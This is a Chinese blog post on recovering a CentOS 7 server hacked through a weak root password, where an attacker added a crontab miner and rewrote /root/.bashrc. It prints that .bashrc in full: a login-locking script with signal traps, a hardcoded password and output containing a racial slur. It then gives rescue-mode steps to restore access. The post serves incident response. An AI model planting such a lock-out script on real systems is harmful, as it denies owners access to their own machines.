CentOS7 服务器被黑“baga parola negrule“

已于 2022-02-21 14:43:38 修改
阅读量712 收藏 1
点赞数
分类专栏: Linux centos 文章标签: 服务器 linux debian 运维
于 2022-02-21 14:23:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44424929/article/details/123015414
版权
Linux 同时被 2 个专栏收录
22 篇文章 0 订阅
订阅专栏
centos
20 篇文章 0 订阅
订阅专栏

现象:用root账号登录,系统登录后会自动执行一个脚本,蹦出一句“Baga parola negrule:”要求输入验证码,如果随手敲击键盘并且回车,就会弹出"Fake Nigga"

原因:服务器由于弱口令被黑,/root/.bashrc配置文件被改写,导致无法登录进去。在其中添加了登录后的“Baga parola negrule:”验证脚本;同时蠕虫还在crontab里添加了挖矿脚本的计划任务,保持挖矿脚本一直运行。

解决方案:

1、选择登陆的系统页面时,按“E"进入救援模式

在linux16行的行尾添加内核参数 rd.break

然后Ctrl+X启动服务器,再执行以下命令

#重新挂载(可以省略)
mount -o remount,rw /sysroot/
#切换
sh-4.2# chroot /sysroot/

2、查看 cat /root/.bashrc文件,如果没找到,可能是被隐藏了,被黑的/root/.bashrc文件如下:

sh-4.2# cat /root/.bashrc
# .bashrc
alias cp='cp -i'
alias rm='rm -i'
alias mv='mv -i'
parola="pulamea321!"
echo Uname: $(uname -a)
clear
trap '' 2
trap '' 20
printf "Baga parola negrule:"
read -s pass
if [ $pass == "$parola" ]
then
echo "True Nigga"
else
:
echo "Fake Nigga"
exit;
fi
wait
trap 2
trap 20

其中parola字段为密码,如果登录时使用parola验证码是可以登录进去的,然后修改/root/.bashrc文件内容,也可以这样操作

执行vim /root/.bashrc,修改成正常的,如下:

[root@localhost aa]# cat /root/.bashrc 
# .bashrc
​
# User specific aliases and functions
​
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
​
# Source global definitions
if [ -f /etc/bashrc ]; then
    . /etc/bashrc
fi

3、删除xmrig文件,不是在根目录就是在root下。(此步骤可以忽略)

4、删除被添加的定时任务启动项

#查看启动的定时任务
crontab -l 
#清空定时任务
crontab -r 
#重启服务
systemctl restart crond

5、重启服务器,即可正常登录(硬件关机重启也行)

#重启
reboot

6、修改root用户密码

su root
passwd
番茄炒鸡蛋饭哟
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
检测Linux系统是否被的技巧
07-29
本文主要和大家分享检测Linux系统是否被的技巧,感兴趣的朋友可以看看。
Centos7搭建主从DNS服务器的教程
09-14
主要介绍了Centos7搭建主从DNS服务器的教程,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
CentOS7服务器baga parola negrule“的问题
nihaowoshilzz的博客
10-22 1209
记一次服务器,登录root账户显示"baga parola negrule"的问题: 普通账户可以登录,登录后发现被安装了GONME图行桌面,这个东西会限制root的登录。 百度发现很多人遇到此问题,主要原因为服务器由于弱口令被攻击,/root/.bashrc文件被改写,无法登录root账户。如下图(网上找的)parola字段为密码 各种尝试后发现因root权限限制被登录的问题造成无法修复/root/.bashrc文件。 记录以下修复步骤供大家参考: step0:先进入普通账户,修改r
【Ubuntu 18】终端出现“baga parola negrule
lasgalen
02-16 967
这里写自定义目录标题1、进入救援模式2、修改 .bashrc,3、再次修改.bashrc 服务器终端出现“baga parola negrule”,输入什么都闪退,百度了一下发现是被了,重启之后密码错误进不去。记录一下处理方式。
机房Ubuntu服务器,修改root密码后显示baga parola negrule
weixin_42866551的博客
02-15 448
机房Ubuntu服务器,修改root密码后显示baga parola negrule服务器重置root密码显示baga parola negrule 服务器 寒假登录机房服务器发现用户密码错误,登录远程界面查看发现账户多了一个salad,同时root密码也错误,我第一次感受到了客的不友好,shift! 重置root密码 服务器版本为Ubuntu20.04,操作按照网上教程(https://blog.csdn.net/qq_44721831/article/details/122182958)
测试机centos5.6被
刘青山的资料库-发表是最好的记忆
06-30 188
  [root@localhost mysql]# ps -ef|grep java Unknown HZ value! (193) Assume 100. Segmentation fault  今天来发现局域网的测试机被了,牛逼!  
CentOS 7 搭建HAproxy服务器
04-10
CentOS 7 搭建HAproxy服务器
华为服务器安装centos7.zip
03-29
因为之前接触华为服务器较少,所以遇到了不少坑,我将遇到坑全部解决之后形成了这一份超详细的centos7.7的部署文档,希望帮到遇到相同问题的人。
Centos7下Samba服务器配置(实战)
09-14
主要介绍了Centos7下Samba服务器配置(实战),文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
基于Centos7 部署Varnish缓存代理服务器
09-14
主要介绍了基于Centos7 部署Varnish缓存代理服务器,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
centos监控web目录www下的文件是否被、挂马的脚本
高效码农
12-05 263
1、检查是否有安装inotify rpm -qa inotify-tools 2、没有先安装epol源 wget -O /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo/epel-6.repo 3、安装 yum install inotify-tools -y 4、脚本 脚本地址:www.xugj520.cn/archives...
排查服务器的一些方法
08-09 752
1.awk -F: '{if($3==0 || $4==0) {print $0} }' /etc/passwd #查看用户和组为0的用户 2.stat filename 查看可疑文件日期 4.对服务器异常进程进行检查 netstat -anpt,检查异常IP连接,查询ip归属地如果是国外的,查询pid ,lsof -p pid 查看进程打开了哪些文件,查询当前占用cpu 大于30%的进程,top 大写P,检查该进程所在目录,ll /proc/pid,其中cwd是程序运行目录,exe是程序...
centos 系统服务器客攻击怎么办?
求是
03-05 1572
1.先把sshd登录这块给他搞定 #!/bin/bash rm -rf /home/shell/ip_list cat /var/log/secure | grep "Failed password for" | awk '{print$(NF-3)}' | sort | uniq -c > /home/shell/ip_list #cat /var/log/secure | grep...
挖矿病毒分析(centos7)
ntgengyf的博客
07-25 771
本次服务器被入侵,被人植入了密钥文件,导致入侵者可以免密登录服务器,在redis中看到了一个很奇怪的key,它的value的意思是一个定时任务通过curl下载某个sh脚本,并执行,看到网上的一位博主,总结的很好,它总结的原因如下。比较有名的挖矿蠕虫病毒,攻击手段为通过redis感染服务器,如果redis的端口为默认的6379且暴露在公网上,且没有设置客户端连接密码认证,很容易感染,这个病毒是分级别的,好在我遇到的是比较简单的,解决方法如下。.相关的代码,查看进程发现果然多了一个redis-cli的进程。
centos7服务器版安装
最新发布
09-27
centos7服务器版的安装步骤如下: 1. 首先,从http://mirrors.aliyun.com/centos/7/isos/x86_64/ 下载centos 7服务器版的镜像文件。 2. 将下载好的镜像文件写入到U盘或DVD中。 3. 将U盘或DVD插入要安装centos7的服务器计算机中。 4. 启动服务器计算机,并从U盘或DVD引导。 5. 在启动菜单中选择“Install CentOS 7”并按下回车键。 6. 进入安装向导界面后,选择适当的语言和键盘布局。 7. 在安装类别中选择“服务器安装”并进行自定义分区设置(可选)。 8. 设置网络连接(可选)。 9. 设置root密码和创建用户账号。 10. 点击“安装”按钮开始安装过程。 11. 安装完成后,重新启动服务器计算机。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值